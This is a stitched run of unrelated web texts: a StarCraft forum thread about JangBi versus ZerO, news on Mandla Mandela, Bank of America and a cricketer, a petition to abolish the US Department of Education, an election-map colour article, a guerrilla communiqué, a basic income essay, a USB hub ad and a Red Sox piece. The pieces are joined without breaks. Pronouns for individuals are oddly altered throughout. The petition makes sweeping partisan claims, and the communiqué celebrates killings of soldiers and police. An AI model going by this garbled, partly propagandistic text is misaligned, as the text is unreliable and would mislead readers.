215 total votes (61)28%(54)25%(39)18%(37)17%(14)7%(10)5%215 total votes Your vote: Most likely outcome? (Vote): JangBi > ZerO 3-0
(Vote): JangBi > ZerO 3-1
(Vote): JangBi > ZerO 3-2
(Vote): ZerO > JangBi 3-0
(Vote): ZerO > JangBi 3-1
(Vote): ZerO > JangBi 3-2
1:1 go sc2 LAN? Oh wait...
Zona Profile Blog Joined May 2007 40425 Posts #3 For the sake of a better final, I hope Jangbi wins.
I don't think it'll be easy, though. "If you try responding to those absurd posts every day, you become more damaged. So I pay no attention to them at all." Jung Myung Hoon (aka Fantasy), as translated by Kimoleon
Kipsate Profile Blog Joined July 2010 Netherlands 29335 Posts #4 Jagnbi please win. Writer Xiao8~~
AdrianInzunza Profile Joined December 2010 Mexico 44 Posts #5 ye hoping for a TvP finals go jangbi, mb fanta vs jangbi rematch?
SlowBullets Profile Blog Joined December 2011 United States 836 Posts #6
Also, hype in any form (picture, video, text, etc) is welcome as well. . .
Finally, when the official map pool is released and I do not update it early enough please tell me to edit. Thank you very much!
+ Show Spoiler + JangBi GO First of all, anyone who has an epic banner, please feel free to PM me and I will update ASAP!Also, hype in any form (picture, video, text, etc) is welcome as well. . .Finally, when the official map pool is released and I do not update it early enough please tell me to edit. Thank you very much! 1:1 go sc2 LAN? Oh wait...
nbaker Profile Joined July 2009 United States 1322 Posts #7 Hm, I honestly think Jangbi has no chance. Zero's so good at ZvP and he's been playing with confidence recently. I expect a lot of early hydralisk builds that either kill Jangbi straight up or put them far behind and then Zero to dominate them in the late game.
Maybe I'm just a fanboy though :D
bgx Profile Joined August 2010 Poland 6587 Posts #8
Some hype
http://www.youtube.com/watch?v=mGhfuvd9DTM Haha i wanted to post that Jangbi troll pic. Good job OP.Some hype Stork[gm]
SlowBullets Profile Blog Joined December 2011 United States 836 Posts #9 On July 03 2012 22:58 bgx wrote:
Haha i wanted to post that Jangbi troll pic. Good job OP.
Some hype
http://www.youtube.com/watch?v=mGhfuvd9DTM Haha i wanted to post that Jangbi troll pic. Good job OP.Some hype
Ironic thing about this video is that the video is JangBi vs ZerO! Hopefully we get a replicate of moments like these.
Thanks though! Added to the OP. Ironic thing about this video is that the video is JangBi vs ZerO! Hopefully we get a replicate of moments like these.Thanks though! Added to the OP. 1:1 go sc2 LAN? Oh wait...
bgx Profile Joined August 2010 Poland 6587 Posts Last Edited: 2012-07-03 14:08:20 #10 On July 03 2012 23:02 SlowBullets wrote:
Show nested quote +
On July 03 2012 22:58 bgx wrote:
Haha i wanted to post that Jangbi troll pic. Good job OP.
Some hype
http://www.youtube.com/watch?v=mGhfuvd9DTM Haha i wanted to post that Jangbi troll pic. Good job OP.Some hype
Ironic thing about this video is that the video is JangBi vs ZerO! Hopefully we get a replicate of moments like these.
Thanks though! Added to the OP. Ironic thing about this video is that the video is JangBi vs ZerO! Hopefully we get a replicate of moments like these.Thanks though! Added to the OP.
Yup i know, it was during their massive slump and this game happened
Incredible comeback. Yup i know, it was during their massive slump and this game happenedIncredible comeback. Stork[gm]
NicksonReyes Profile Blog Joined May 2010 Philippines 4429 Posts #11 Can't wait for the playguu's and storm drops! "Start yo" -FlaSh
HighTemper Profile Joined April 2011 Canada 3867 Posts #12 Jangbang, yes pls. "Issue the orders Sir [JangBi], and I will storm Hell." - Anthony Wayne
red4ce Profile Blog Joined January 2011 United States 7302 Posts #13 Jangbi MUST win, for the sake of the finals. The last thing we need is a repeat of the ABC MSL.
NicksonReyes Profile Blog Joined May 2010 Philippines 4429 Posts #14 On July 03 2012 23:22 red4ce wrote:
Jangbi MUST win, for the sake of the finals. The last thing we need is a repeat of the ABC MSL.
Fantasy vs Zero will have queens and valks and all that awesome stuff. The only thing missing is an epic storyline rofl. Fantasy vs Zero will have queens and valks and all that awesome stuff. The only thing missing is an epic storyline rofl. "Start yo" -FlaSh
amazingxkcd Profile Blog Joined September 2010 GRAND OLD AMERICA 15736 Posts #15 Zero must win, for BW! The world is burning and you rather be on this terrible website discussing video games and your shallow feelings
Kittan Profile Joined April 2012 Poland 2063 Posts #16 JangBi must win not only for the sake of having a shot at winning 2 OSL's in a row, but also to have a rematch vs Fantasy.
No disrespect for ZerO, but I'd rather not have my last OSL finals ever to be a boring walkover like ABCMart. Also think of the hype video possibilities for NTS if we end up with a rematch.... YEAH GO JANGBI GO! http://www.teamliquid.net/forum/viewmessage.php?topic_id=81288 <--- How I fell in love with a man, a team, a game and a website in a single day... | "There are no false gods, there is only the Emperor, and Choi Yun Sung is their prophet." -> Zona 40k
baubo Profile Joined September 2008 China 3370 Posts #17 On July 03 2012 23:10 NicksonReyes wrote:
Can't wait for the playguu's and storm drops!
Unfortunately, you'll likely see a battle between hydras and cannons. The state of PvZ these days are quite sad. Unfortunately, you'll likely see a battle between hydras and cannons. The state of PvZ these days are quite sad. Meh
red4ce Profile Blog Joined January 2011 United States 7302 Posts #18 On July 03 2012 23:37 NicksonReyes wrote:
Show nested quote +
On July 03 2012 23:22 red4ce wrote:
Jangbi MUST win, for the sake of the finals. The last thing we need is a repeat of the ABC MSL.
Fantasy vs Zero will have queens and valks and all that awesome stuff. The only thing missing is an epic storyline rofl. Fantasy vs Zero will have queens and valks and all that awesome stuff. The only thing missing is an epic storyline rofl.
Yeah but Fantasy won't be in the finals. Flash vs Zero will be a slaughter, like a tank squishing a bunny. Yeah but Fantasy won't be in the finals. Flash vs Zero will be a slaughter, like a tank squishing a bunny.
Sayle Profile Joined October 2010 United Kingdom 3685 Posts #19 I will cast this live.
Protoss hwaiting~
Kiett Profile Blog Joined March 2011 United States 5789 Posts #20 On July 03 2012 23:37 NicksonReyes wrote:
Show nested quote +
On July 03 2012 23:22 red4ce wrote:
Jangbi MUST win, for the sake of the finals. The last thing we need is a repeat of the ABC MSL.
Fantasy vs Zero will have queens and valks and all that awesome stuff. The only thing missing is an epic storyline rofl. Fantasy vs Zero will have queens and valks and all that awesome stuff. The only thing missing is an epic storyline rofl.
Yeah uh... That's not at all what happened the last 5 times Fantasy has met Zero within this last year. The games were all pretty bad, and Fantasy just steamrolled through Zero like they were a bug.
I like Zero, but unless they can guarantee that they can put up a better performance against Fantasy than these recent games, or a better performance against Flash than the ABCMart MSL finals... my vote will have to go to Jangbi. Yeah uh... That's not at all what happened the last 5 times Fantasy has met Zero within this last year. The games were all pretty bad, and Fantasy just steamrolled through Zero like they were a bug.I like Zero, but unless they can guarantee that they can put up a better performance against Fantasy than these recent games, or a better performance against Flash than the ABCMart MSL finals... my vote will have to go to Jangbi. Writer :o
1 2 3 4 5 116 117 118 Next
The grandson of South African anti-apartheid revolutionary and politician, Nelson Mandela, has called on South Africa's government to expel the Israeli ambassador to Pretoria and sever all diplomatic and business relations with the Tel Aviv regime.
On Sunday, Mandla Mandela, who is a member of parliament for the ruling African National Congress (ANC), urged ANC caucus in legislature to pressure the government to send Arthur Lenk out of the country, and recall South Africa's Ambassador to Israel Sisa Ngombane, and cut all ties, Turkey's official Anadolu news agency reported.
“History calls upon us to take similar measures to those taken by freedom, justice and peace loving communities that supported the global anti-apartheid movement against the brutal and illegitimate South African regime,” they said.
Mandela also praised the decision made by a group of ANC lawmakers to turn down an Israeli delegation's request to meet.
“Parliament has stayed true to Nelson Mandela's commitment to stand by the Palestinian cause until Palestine is free,'' they said in a statement.
The Congress of South African Trade Unions (Cosatu) also welcomed the measure.
“Cosatu joins solidarity organizations, human rights bodies and other groups in welcoming the decision by the parliament of South Africa to turn down a request to meet with a visiting delegation from Israel,” the group said in a statement.
South Africans march in solidarity with the besieged Gaza Strip, in Cape Town on August 9, 2014.
Most South Africans have historically supported the Palestinians due to similarities between the Israeli occupation and South Africa's apartheid era.
Mandela said in 1997 that “our freedom is incomplete without the freedom of the Palestinians.”
South African Nobel peace laureate Archbishop Desmond Tutu said in 2002 that their trip to Palestine had reminded them “so much of what happened to us black people in South Africa.”
The Israeli regime on the one side and Egypt, Jordan, and Syria on the other fought the Six-Day War on June 5-10, 1967.
At the end of that war, Israel occupied the West Bank, East Jerusalem al-Quds, the Gaza Strip, and parts of the Golan Heights. Israel later withdrew from Gaza but has kept the coastal enclave under a crippling siege since 2007.
Palestinian authorities want the resolution of the conflict with Tel Aviv based on the so-called two-state solution along pre-1967 boundaries, but Israeli officials have so far refused the call.
Petition To Support H.R. 899 Terminate The Department Of Education
“The Department of Education shall terminate on December 31, 2018.”
Those words are the entire content of a new bill, H.R. 899. This bill was introduced by courageous Congressman Thomas Massie (R – Kentucky).
H.R. 899 is revolutionary.
H.R. 899 will end the destruction of America's education system.
H.R. 899 should have been introduced 37 years ago.
But no Republican has had the courage to do the right thing in all those years – until now.
That's why I'm asking you to stand with this courageous Congressman to help them get this vital bill passed in Congress and delivered to President Trump's desk for their signature.
Please sign the enclosed petition to Congressman Massie telling them you support H.R.899.
♦ Petition To: Terminate The Department Of Education
And I will personally deliver your signed petition to them so that they may display yours and thousands more to show Congress the American people demand an end to the federal Department of Education.
This is what you and I have been waiting for.
It's the end of the federal government messing with the minds of our children, indoctrinating them with leftist propaganda.
The end of Common Core!
The end of the power of the National Education Association (NEA) the most powerful union in the nation – and the one that directly affects your child's future!
These programs and policies are the NEA's agenda:
Goals 2000, School to Work, Workforce Development Boards, pumping drugs like Ritalin into our children. And now today – Common Core.
Classrooms are torturing your children with idiotic programs like Common
Core where the questions make no sense – defy logic and cause them to quit.
American history has been removed. Instead of learning about the Declaration of Independence the children have been indoctrinated to accept the UN's Declaration on Human Rights.
Academics have nearly disappeared from the classroom and the children are pummeled with propaganda on global warming.
The Department of Education's policy is to determine that your children are sick if they believe in their nation as a bastion of freedom. Or if they love God and their families.
As a result of 38 years of the Department of Education our children have been successfully turned into ignorant, pliable global village idiots!
Does that sound harsh?
Then take a good look around you. Look at the surge of young people who unquestioningly supported avowed Socialist Bernie Sanders for president.
Look at the sick images of college students who need counseling and coloring books to deal with anyone who expresses opinions other than those deemed to be politically correct by the Education establishment.
It's all fed through the Department of Education. And if our nation is to survive it must stop!
That's why you and I must take a stand to help Rep. Massie succeed in terminating the Department of Education.
♦ Petition To: Terminate The Department Of Education
In introducing their H.R. 899 Rep. Massie said, “States and local communities are best positioned to shape curricula that meet the needs of their students.”
And they are absolutely right.
That's why we have 50 state school boards. And it's why nearly every community in the nation has a locally-elected school board – so parents have a say in their child's education.
Through that system of local control the United States education system was the envy of the world. Today it is a pathetic failure.
H.R. 899 has been long overdue.
In 1980 Ronald Reagan promised to get rid of the Department of Education that was started by Jimmy Carter just a year before. Reagan was betrayed by the same type of establishment Republicans that now threaten Donald Trump.
In 1996 the Republican Party Platform said the “federal government has no constitutional authority to be involved in school curricula… That is why we will abolish the Department of Education, end federal meddling in our schools and promote family choice at all levels of learning.”
Republicans lost the presidential race that year and so the Department of Education survived.
Today you and I have a new chance.
During the recent campaign, President Trump called for slashing the Department of Education Budget. They certainly see the danger.
And I am quite certain that new Education Secretary Betsy DeVos would gladly see their position ended if it also meant the end of the Department of Education. That would be a victory for them and the Trump Administration.
♦ Petition To: Terminate The Department Of Education
So let's take the right action today.
Let's end the power of the National Education Association.
Let's save generations of children from being enslaved in ignorance.
Let's save millions of tax payer dollars.
And let's take the first vital steps in draining the swamp and restoring our nation's precious Republic.
All of that can be achieved by passing a simple one-line bill.
“The Department of Education shall terminate on December 31, 2018.”
It's that simple.
I started my fight against the Department of Education in the 1990s when Bill Clinton was president. They had introduced Goals 2000 and the rest of the policies to change our education system. This was before Common Core.
I walked all over Capitol Hills meeting with Members of Congress, begging them to stop these programs. Incredibly, Republicans were actually sponsoring many of them.
I actually succeeded three times in stopping the passage of the Workforce Development Act – then called the Careers Act – until I was betrayed by a U.S. Senator from Ohio – Mike DeWine. They lied on the floor of the Senate by saying I and Phyllis Schlafly supported the bill. Their lie passed the bill.
Please, join with me in supporting Congressman Thomas Massie's bill H. R. 899. We can finally terminate the federal Department of Education and return education policy to the local level where you have a say in how it is done!
Please sign my enclosed petition of support to Rep. Massie so they can prove the American people support their bill and demand an end to the Department of Education.
♦ Petition To: Terminate The Department Of Education
Also, if you can, please call you member of congress and ask for their support of the bill. In fact, if you can, ask him/her to co-sponsor it. They have 7 co-sponsors so far. If we can get 50 Members of Congress to sign on we can pass H.R. 899!
You can call your Congressional Representative at 202-224-3121. Just ask for him/her by name. You will be automatically connected.
I am doing everything I can to build support for the bill. Will you help me lead that effort across the country?
But we can win this battle to terminate the Department of Education because the American people are finally fed up with these tyrannical policies of the Left. We've never had a better opportunity.
H.R. 899 is our best chance to stop the destruction of our American way.
♦ Petition To: Terminate The Department Of Education
© 2017 Tom DeWeese – All Rights Reserved
print
Image caption Bank of America denied charges it misled investors
The US government filed two lawsuits against Bank of America relating to fraud on $850m (£553m) of mortgage-backed securities.
The Justice Department and the Securities and Exchange Commission filed parallel suits in North Carolina.
Attorney General Eric Holder said the government wanted "justice for those who have been victimized."
Bank of America denied the charges, arguing "these were prime mortgages sold to sophisticated investors."
The bank already hinted it expected the suits in a filing last week.
'Wilfully misled' investors
In the Justice Department suit, the government alleged that Bank of America "knowingly and wilfully misled investors about the quality and safety of their investments" in a residential mortgage-backed security known as BOAMS 2008-A.
The security, worth around $850m when it was issued in January 2008, eventually collapsed during the crisis as the quality of the loans contained in it soured.
This led to investor losses of more than $100m according to the complaint.
Bank of America says that the fact that the security failed was not the fault of the bank.
"We are not responsible for the housing market collapse that caused mortgage loans to default at unprecedented rates and these securities to lose value as a result," it argued in a statement.
Bank of America has recently announced a series of settlements, including an $8.5bn settlement with investors dealing with similar mortgage-based securities and a $1.6bn deal with MBIA Inc, a bond insurer.
Every 4 years, we're given a map like this:
Usually, a dissatisfied data visualizer is less than thrilled with entire states being designated as either red or blue. The analyst, wanting a clearer picture of the political landscape, breaks the original map down to a county-level:
With this graph, the analyst can see that the states are a patchwork of red and blue counties. But there's an unanswered question. Did every single person inside a given county cast the same vote? Or, were the voters within the counties divided? This graph doesn't show this information. It just shows which choice won, even if it was by one vote. So we decide to blend each county's red and blue vote ratios together, instead of letting the winner take all. This way if we get a pure red or pure blue county, then we know that everybody cast the same vote. And if we get a purple county, then the voters were divided. This is the result:
A nice blend revealing smooth purple transitions between red and blue regions. We can now see that there was hardly a landslide victory in any county. But there's still a problem. When looking at some of the purple counties, it can be hard to decipher if the purple is leaning more towards red or blue. And it gets difficult the closer the counties get to 50/50 red/blue. In fact a R>B county can be confused as a R<B county depending on adjacent colors. In an attempt to see the margins within the counties, we end up with something that's close, but no cigar. What's wrong?
The problem is that in the purple map we're no longer discerning between two distinct hues (a specific red hue and specific blue hue), but an indiscrete number of purple hues found in-between red and blue.
Magenta (I will call purple this from now on) is what our brain registers when we observe an equal mixture of red and blue light with the absence of green. We created the purple map because pure red and pure blue counties didn't show us the vote margins. But the purple hues are nonsense. We end up looking for the quality of red-ness or blue-ness inside each purple hue to create sense. We don't need purple at all.
So is there a way for us to blend together red and blue hues without creating any new nonsensical hues in the process?
Of course! We add green, and we get a Neutralizing election map:
Interesting. How does this work? Basic color theory.
We can describe all colors as combinations of Red, Green, and Blue light. Earlier, we established that Magenta is the mixture of Red and Blue light, with the key absence of Green. But we don't have any reservations about the absence of green for our purposes. We just want to create a gradient between red and blue. So instead of falling victim to Magenta, we can use Green to neutralize the purple-ranged colors.
For a given purple-ranged hue, if we take the weaker intensity value of that purple's Red and Blue components — let's call that value J — and then set the purple's green component to that J value, the purple disappears. What's left behind is either red or blue- whichever one was stronger in the original purple.
So if we take RGB[175/0/150] and Neutralize it to RGB[175/150/150], then the red hue sticks out, with some desaturation.
If we take RGB[150/0/175] and Neutralize it to RGB[150/150/175], then the blue hue sticks out, with some desaturation.
And if we Neutralize magenta, which is a 50/50 split between red and blue, the result will be a completely desaturated color since the red, green, and blue values would all be exactly the same. For example: RGB[128/0/128] Neutralizes to RGB[128/128/128].
This makes sense, because when mixing together high-intensity Red, Green and Blue light, we get pure white light, which has no color saturation.
This is awesome! Thanks to this neutralizing algorithm we can pit two hues against each other and only one of the original 2 hues will be the resulting victor. No new hues! The only hues on the Neutralizing map are hue#0/hue#360 (Red) and hue#240 (Blue). So now the degree of red/blue saturation reveals the margins.
If a county even has the slightest hint of color saturation, then that color is that county's marginal vote. There can be no dispute. This allows us to observe minute margins, such as a 49/51 red/blue split. *But there are limits to how nuanced the margins can be, since RGB's 8-bit color-space can't accept too many significant figures.
This Neutralizing Map can bring to our attention things we didn't notice before — such as the blue streak in the Bible Belt isolated from the reds by a grey buffer, which doesn't really call out to us in the Purple map.
Here's how relative voter-turnout appears on the Neutralizing graph:
Notes:
Counties with lower opacity had fewer votes.
—
440 counties had a total vote count above the upper fence of 63,239.5 and are fully opaque
—
Alaska does not provide county-level data.
The principle behind the neutralizing map algorithm can work for all sets of colors. For example, we can neutralize a graph that has 4 fields represented by red, green, orange, and yellow. Grey would still be the intermediary between all the hues. It would just take a little extra work since we'd need to abstract away RGB.
Engineers use visualizations like this all the time, and the results can be useful. Take a look at Teddy_the_Bear's cartogram. They diverge by adjusting gamma & luminosity, resulting in darker reds and brighter blues. Here's a Massachusetts map that does something similar by avoiding purple. Although, unlike the Neutralizing map, the blues and reds in the Massachusetts map end up changing in hue when transitioning towards their assigned neutral. There's also professor Robert Vanderbei's margin-of-victory/tilt maps. Obvious differences are that the Neutralizing map results in a grey neutral instead of a brighter, white neutral.
All maps copyright © Lawrence Weru
HPG: 43 soldiers and 6 police killed in actions by guerrillas (Kurdistan, Turkey)
Guerrillas affiliated to HPG (People's Defense Forces) and YJA Star (Free Women's Troops) continue their actions in response to the ongoing attacks and operations by Turkish military forces.
Thursday, September 3, 2015 at 5:00 PM
BEHDINAN – ANF
Guerrillas affiliated to HPG (People's Defense Forces) and YJA Star (Free Women's Troops) continue their actions in response to the ongoing attacks and operations by Turkish military forces.
HPG Press Office reported that a total of 43 soldiers and 6 police were killed in actions by guerrillas.
According to the statement, guerrillas hold the road between Hakkari's Yüksekova district and Geliyê Doskî area and the one between Mergê Zerê- Şıtaza and Oremar guard post since August 10.
Turkish army airdropped soldiers in Çelareşkê area at 10:00 on September 2 and started an operation in the area.
Responding to the military activity of Turkish troops, guerrillas hit from five sides the soldiers that attempted to enter Geliyê Doskî from Çelareşkê in three groups.
The action by guerrillas killed 10 soldiers in the first group, 5 in the second group and three in the third group.
Guerrillas hindered the Turkish troops that attempted to enter the area to remove the casualties after the action. While clashes in the area continued till 19:00 in the evening, Turkish army shelled Geliyê Doski area from guard posts in surrounding areas.
One soldier was killed in an assassination action conducted by guerrillas against soldiers at Şemzinan Brigade at 16:00 on September 1st.
On September 2, Turkish troops from Garê and Şemzinan Brigade guard posts launched an operation in Katûna, Helena and Garê triangle area in Hakkari's Şemzinan (Şemdinli) district, the control of which had been taken by guerrillas on August 28.
Guerrillas hit the Cobra type helicopters that flew over the area at 07:00, and forced them to retreat.
A group of soldiers participating in the operation entered the area of guerrillas, upon which a short-lasting clash erupted.
Simultaneously with the operation, Turkish forces shelled the Helena-Katûna-Garê triangle, as well as Hill Geniş and Hill Konserve, in response to which guerrillas hit the Gare guard post. The Turkish operation in the area continues.
Guerrillas sabotaged and destroyed the Qaportê bridge between Yüksekova – Şemzinan districts of Hakkari at 00:00 on September 3rd.
In another action targeting hills held by Oremar guard post, guerrillas damaged one tank and one emplacement at 14:50 on August 2nd.
BASE STATION DESTROYED
Guerrillas destroyed a base station in Albayrak village in Van's Başkale district at 21:00 on September 2nd.
One soldier was killed in an assassination action conducted by guerrillas against Kısımlı guard post in Başkale at 05:45 on September 2nd. One other soldier was killed as guerrillas also hit the soldiers that came to the scene in the wake of the action.
Guerrillas hit a military armored vehicle in Miks (Bahçesaray) district of Van on September 1st. The vehicle retreated from the area following a short-lasting clash.
A vehicle carrying supplies to Bêgendê guard post in Siirt's Kurtalan district was burnt down at 13:30 on September 2nd.
19 SOLDIERS KILLED IN BESTA
A guerrilla unit was ambushed by Turkish soldiers in Çiyayê Fıllah area of Besta region on September 1st, upon which a clash erupted, lasting till 19:00 in the evening.
Intervening the scene with Cobra type helicopters at 16:00, Turkish troops at Gundıkê Mellê and Çelê Nımêja guard posts in Şırnak bombarded the area with howitzers and mortars. 15 soldiers were verified killed as guerrillas responded to the attacks. Details of the clashes will be announced later.
Martyr Kamuran team conducted an action against the soldiers guarding the security hill of Şırnak Brigade at 10:35 on September 2nd. Four soldiers were killed in the action which was carried out in memory of the four guerrillas fallen in Besta.
Guerrillas destroyed a base station in Şevasor village of Şırnak's Silopi district at 22:00 on September 1st.
One soldier was killed in an assassination action conducted by guerrillas against Korxê guard post in Amed's Lice district at 12:00 on September 2nd. Guerrillas also hit a container and tower in the post, but the casualties couldn't be verified.
Turkish army airdropped soldiers onto Hill Zerga in Karas-Lice-Hani triangle area in Amed from 07:00 to 08:30 on September 2nd.
Guerrillas destroyed a base station in Yayla area in Bingöl's Genç district at 21:30 on August 30.
ACTION IN MEMORY OF MARTYR DERSİM
Guerrillas conducted another action against Kanakder guard post in Bitlis in memory of Martry Dersim at 10:00 on September 2nd. Two soldiers were killed and one other was wounded in the action in which the entrance gate of the post was also hit.
Cobra type helicopters intensely shelled the scene at noon, while Sikorsky helicopters removed the casualties from the area.
SIX POLICE KILLED IN ELAZIĞ
As part of the ongoing actions in Martyr Rojhat Batman Initiative, Martyr Destan and Martyr Fırat Revenge teams conducted an action against police station in Kovancılar area of Elazığ at 20:15 on September 2nd. Six police were killed and many others were wounded as guerrillas hit the police group outside the station and the sentry boxes with rockets. The action was conducted in memory of Martyr Fırat, Martyr Destan, Martyr Cihand and Martyr Ekin Van.
On August 27, a team affiliated to HPG forces killed İsmet Tatar and their son who played a role in the murder of four guerrillas and many patriotic civilians in Şırnak's Silopi district.
Tags: HPG (People's Defence Force), Kurdistan, Turkey, War, YJA Star (Free Women's Troops)
This entry was posted on Friday, September 4th, 2015 at 4:49 pm and is filed under Autonomy.
By John Rondina
Part One
Some critics of basic income argue that people will become lazy should we implement basic income in Ontario or Canada. Is there any logic to such thinking?
Is it logical to use deprivation to keep people in jobs that don't pay? Do we really expect a growing precariat to believe in society if societal attitudes are to carry a big stick when it comes to poverty? Does the mother, the student, the recently unemployed, the person now working a low wage believe in social justice? What happens when people stop trusting in governments, the stock market and other institutions?
We used to use a whip to drive our horses and our buggies forward. Is that how we want to treat our fellow human beings? By using a big stick?
How well did the big stick of days gone by function when there was no longer a horse pulling a carriage? How well did it function when the horse doing the work was now an ‘iron horse', and that ‘iron horse' was born in assembly? Especially, as the human hands of assembly are becoming robot hands. And, as we are learning that one day the robots may even dream.
What if the horses that were replaced by the locomotive were human beings?
When it comes to the creation of policy, even if we have laudable intentions like, ecological sustainability, the development of green technologies, equality and helping people out of poverty, we can't leave others in a state of precariousness. We have to measure our policy by how many it will lift up. We also need to moderate the detrimental effects of technology.
We have problems …
This year ‘… a parade of CEOs met in secret to examine the sorry state of publicly traded companies'. They included Warren Buffett amongst them, who has said: “The rich have come back strong from the 2008 panic and the middle class haven't and that effects demand and that effects the economy,” speaking to CNN. “We don't need to have the extremes of inequality that we have. The people at the bottom end should be doing better. I think it behooves this very rich country to have less inequality than we have.” Buffett's always been very good at simplifying complex topics.
While Buffet may have been speaking specifically about the U.S., is Canada not a rich country? Wouldn't less inequality be a laudable goal for Canada as well?
While you may not agree with everything the above group of privileged individuals think, the fact that they think there's a problem should tell you that there is one. It's impossible to deny there's a problem as some later data will show.
Even if you don't believe the evidence before your eyes or the thousands of advocates for improvement on social policy, the precariat, basic income, etcetera, take a look at how Canadians feel about things and extrapolate that feeling out to how such feelings will affect the economy if you believe the economy will take care of itself. Has it taken care of itself since the financial crisis?
… And we have trust issues
So, we're not only facing a dilemma brought on by our technology, but one of wealth redistribution, one where people have deep distrust of government, how we raise capital and invest to improve our future. Studies show serious problems:
Trust in public institutions has declined especially in the wake of the financial crisis.
The decline in the financial sector is especially large.
Countries that experienced the largest rise in unemployment saw public confidence in national governments and the finance sector decline ‘particularly dramatically.'
How is this new normal of high unemployment world-wide and economic malaise perpetuating the lack of public confidence in national governments and financial institutions? In an increasingly global world where information is shared quickly, public trust issues in government and organizations are shared at the speed of light, too. This creates a vicious downward spiral for an economy since economies depend on trust in order to function at a near-optimal level for the greatest number of people. When people feel that they're in a rigged casino, they ask themselves, why should I play fair? In order to gain support for policy shifts, government needs to win trust in order to win support.
In order to do the right thing, you have to be trusted to do the right thing.
Where are the horses now?
Machines and what they replace are a great analogy for what is going wrong in our society on so many levels.
A hundred years ago, you replaced a horse with an efficient new machine. Today, you replace a human being: one that thinks, feels, creates, and often, has a family. It's up to the privileged to understand that privilege comes with the responsibility of upholding a trust. That trust is about making things better for as many people as we are able. Privilege involves thinking about the future and constant improvement. This is not simply through the constant improvement of machines. It's through the constant improvement of society and the social policies that make society just.
The next innovator may be living in the deep end of deprivation
We don't only need to retrofit factories for an age of automation. We need to retrofit society. We need to think deeply about how many people are falling into poverty. We need to understand that the next Einstein or Da Vinci may not be sitting amongst the one per cent or even the middle class. They or they may be one of the people who dream and dream from the deep end of deprivation within a society that at the moment is not quite ready for the new prime time.
How much does the loss of one potential Einstein/Da Vinci cost society?
We have to ask ourselves as we watch people lose jobs, policymakers tell us that we are in a ‘new reality', and robots begin to do things like learn what they couldn't do before, well, we have to ask ourselves to learn how to do things better than we did before. If the robots are learning to dream of electric sheep then we better learn how to make our own dreams come true.
Paradigms aren't only about the implementation of technology: paradigms are about implementing the designs that make our world a better place for men, women and children because of what the efficiencies of technology have enabled us to do for one another.
We have spent a lot of our creative energies marketing machines. Today, it's time to believe in the human being. By glorifying the machines, we've forgotten that they were designed to serve us.
We have to do things better by creating more value, by challenging our social policy, and by making sure that if the middle class is shrinking and has shrunk, we are going to do things better. (In Toronto, where I live, 66 per cent of neighbourhoods is middle income in 1970. That number has shrunk to 29 per cent.)
We need to create strategies that will help people grow and think differently so that they are ready for the challenges of the future. Because the future is here.
Right now.
ISLAMABAD: Religious comments by Pakistan batsman Ahmed Shehzad to Sri Lanka player Tillakaratne Dilshan after their one-day international last Saturday are being investigated by the Pakistan Cricket Board.
While the players were walking back to the dressing room in Dambulla, Sri Lanka, Shehzad was caught on camera telling Dilshan “if you are a non-Muslim and you turn Muslim, no matter whatever you do in your life, straight to heaven. “
Dilshan's reply was not audible, and Shehzad went on to say, “Then be ready for the fire.“
Shehzad was summoned to PCB headquarters in Lahore on Wednesday and asked about their comments, board general manager media Agha Akbar told the Associated Press.
“Ahmed has informed the PCB that it was their personal chat with Dilshan, and there was nothing more to it,” Akbar said.
“What we understand is that no Sri Lanka Cricket official or our own manager lodged any complaint.“
However, Akbar said the PCB was still investigating the matter. Dilshan was born to a Muslim father and a Buddhist mother and was known as Tuwan Mohamed Dilshan.
They shed their Muslim name shortly after their international debut in 1999 and took up the name Tillakaratne Mudiyanselage Dilshan with an ethnic Sinhalese-Buddhist identity.
Their childhood coach Ranjan Paranavitana said even though Dilshan carried a Muslim name, they and their brothers and sisters followed their mother's religion from their childhood.
Dilshan scored an unbeaten 50 on Saturday and powered the home team to a seven-wicket victory in the ODI series decider.
The USB HUB mainly used:
Education System: charging for Ipad and Tablet PC
Metro System:wireless application,swiping card system.
Military System:It is hard to say,you know the way.
Showing and Exhibition
Tablet PC,Mobile.
Testing USB equipments and Burning.
Mining for Bitcoin/Litecoin.
The 49ports USB HUB,the outout of 49 USB ports are highly integrated,Adopt MTT freamwork to achieve the MAX power output,to reduce the traffic and delay time,Accord with the standard of Universal Serial Bus.
Features:
1. Low Power:when the high speed of the 49 downward ports are opened,need the current is 1357mA.Only one port is opened the high speed,the current need is 30mA.
2. System provides 0.5 ~ 1A output current for each port
3. Upward port support 480M high speed and 12M full speed and 1.5M.
4. 49 downward ports support 480M full speed and 1.5M low spped
5 Autos recover function.
6 the power LED lights condition.
7. Support Windows98SE/ME.2000.XP.Vista,Win7.
8. Support Mac OS 8.6and above the operating system
9. Support the Linux kernel 2.4.20 and above the operating system
10. The size L*W*H:350*203*35mm.
11. Packing size:.
12. The total weight after packaging is 1.5KG
Noted:only charging,no data transfer,no need to connect the USB input line.
The Boston Red Sox will make offseason trades and prospects will be part of any deal. Just who may go and stay?
Prospects is a term that is difficult to define in baseball terminology since for every “Can't miss” I can present one that has missed. The Boston Red Sox saga is often defined by assessment failures and third base is a classic example. Will Middlebrooks was supposed to be the anchor into the next decade and now Middlebrooks is attempting another “comeback” only with the Texas Rangers.
Boston is rich in prospects and that was demonstrated last season when Dave Dombrowski – majordomo of everything regarding baseball operations – acquired Craig Kimbrel. Dombrowski shipped out the talent of varying degrees of promise and the reasoning was what departed was merely a duplication of what existed or was in the developmental pipeline.
Mention of offseason trades usually included a prized pony or two that now reside within the Red Sox system. If Boston wishes to deal with – and I toss out a team and name – the Chicago White Sox for Chris Sale, then expect prospects to be included.
Boston's system is rich and deep with an excellent performance record when sent elsewhere. A prospect can mature with a more patient organization and an organization that simply views the bottom line – you save payroll. So as the trading season begins in earnest just who is possibly headed elsewhere?
The most exciting of all possibilities is Yoan Moncada for whom Boston paid out somewhere in the vicinity of $62 million. By all accounts, Moncada has five-tool potential and is generally ranked in the top three on the depth chart of all prospects in baseball. If you are dangling a player on the line hoping to hook a deal with Boston then Moncada would be on your required list.
I simply do not see Moncada leaving Boston despite their propensity to accumulate strikeouts at a Dave Kingman type rate. Moncada is raw and may be a few years away, but their talent is evident as is their potential to play just about anywhere. A keeper.
Sam Travis was on the fast track. A big right-hand hitter who is a line drive machine. Travis, despite their size, is not your traditional big time power guy, as in home run production. A beautiful swing that rewards bad pitching with line drives to all fields. Travis is a potential first baseman/designated hitter who may offer an enticing target for a trade.
I expect Travis to be traded, but not now since they are in the recuperative process of a dastardly knee injury. Expect Travis to start with Pawtucket and if the hits keep on coming it will be decision time and I would expect the promising Travis to go.
